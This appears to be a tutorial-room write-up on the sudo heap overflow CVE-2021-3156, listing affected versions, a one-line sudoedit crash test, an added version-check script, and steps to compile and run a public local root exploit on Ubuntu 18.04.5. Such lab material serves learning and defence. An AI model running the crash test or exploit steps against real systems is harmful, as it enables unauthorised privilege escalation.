Baron Samedit (CVE-2021-3156)
A tutorial room exploring CVE-2021-3156 in the Unix Sudo Program. Room Three in the SudoVulns Series
Sudo heap buffer overflow vulnerability
Affected versions:
- Sudo 1.8.2 - 1.8.31p2
- Sudo 1.9.0 - 1.9.5p1
POC:
sudoedit -s '\' $(python3 -c 'print("A"*1000)')
(If this returns `malloc(): memory corruption` followed by `Aborted (core dumped)`, the system is vulnerable to the attack.)
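The affected ranges listed above can also be checked without crashing anything, as a first-pass triage step. This is an added example, not part of the original post; the helper names `sudo_version_num` and `classify_sudo` are hypothetical, and it assumes upstream-style version strings as printed on the first line of `sudo -V`.

```sh
#!/bin/sh
# Added example: first-pass version check for CVE-2021-3156 (defensive triage).
# Function names are hypothetical helpers, not part of sudo.

# Turn an upstream version such as "1.8.31p2" into one integer (1083102).
# Returns 1 and prints nothing unless the string is N.N[.N][pN].
sudo_version_num() {
    ver=$1
    patch=0
    case $ver in
        *p*) patch=${ver##*p}; ver=${ver%%p*} ;;
    esac
    case $ver in
        ''|*[!0-9.]*) return 1 ;;
    esac
    old_ifs=$IFS; IFS=.
    set -- $ver
    IFS=$old_ifs
    [ $# -ge 2 ] && [ $# -le 3 ] || return 1
    for part in "$1" "$2" "${3:-0}" "$patch"; do
        case $part in ''|*[!0-9]*) return 1 ;; esac
    done
    echo $(( $1 * 1000000 + $2 * 10000 + ${3:-0} * 100 + patch ))
}

# Print "affected", "not-affected" or "unknown" for a version string.
# Ranges: 1.8.2 - 1.8.31p2 and 1.9.0 - 1.9.5p1 (from the list above).
classify_sudo() {
    n=$(sudo_version_num "$1") || { echo unknown; return 0; }
    if { [ "$n" -ge 1080200 ] && [ "$n" -le 1083102 ]; } ||
       { [ "$n" -ge 1090000 ] && [ "$n" -le 1090501 ]; }; then
        echo affected
    else
        echo not-affected
    fi
}

# Live check: the first line of `sudo -V` reads "Sudo version <version>".
if command -v sudo >/dev/null 2>&1; then
    installed=$(sudo -V 2>/dev/null | sed -n '1s/^Sudo version //p')
    echo "sudo ${installed:-?}: $(classify_sudo "$installed")"
fi
```

Distribution packages often backport the fix without changing the upstream version string, so treat an "affected" result as a prompt to check the vendor advisory or package changelog rather than as proof.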
EXP:
![](https://img-blog.csdnimg.cn/2021020909063232.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0MTAxMjQ4,size_16,color_FFFFFF,t_70)
POC:
sudoedit -s '\' $(python3 -c 'print("A"*1000)')
![](https://img-blog.csdnimg.cn/20210209090631991.png)
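Download the EXP and cd into the Exploit directory, where there is a Makefile; run make to compile it.
When run, the program reports that an argument of 0/1/2 must be appended.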
![](https://img-blog.csdnimg.cn/20210209090632150.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0MTAxMjQ4,size_16,color_FFFFFF,t_70)
We are on Ubuntu 18.04.5, so we use ./sudo-hax-me-a-sandwich 0
![](https://img-blog.csdnimg.cn/20210209090632101.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0MTAxMjQ4,size_16,color_FFFFFF,t_70)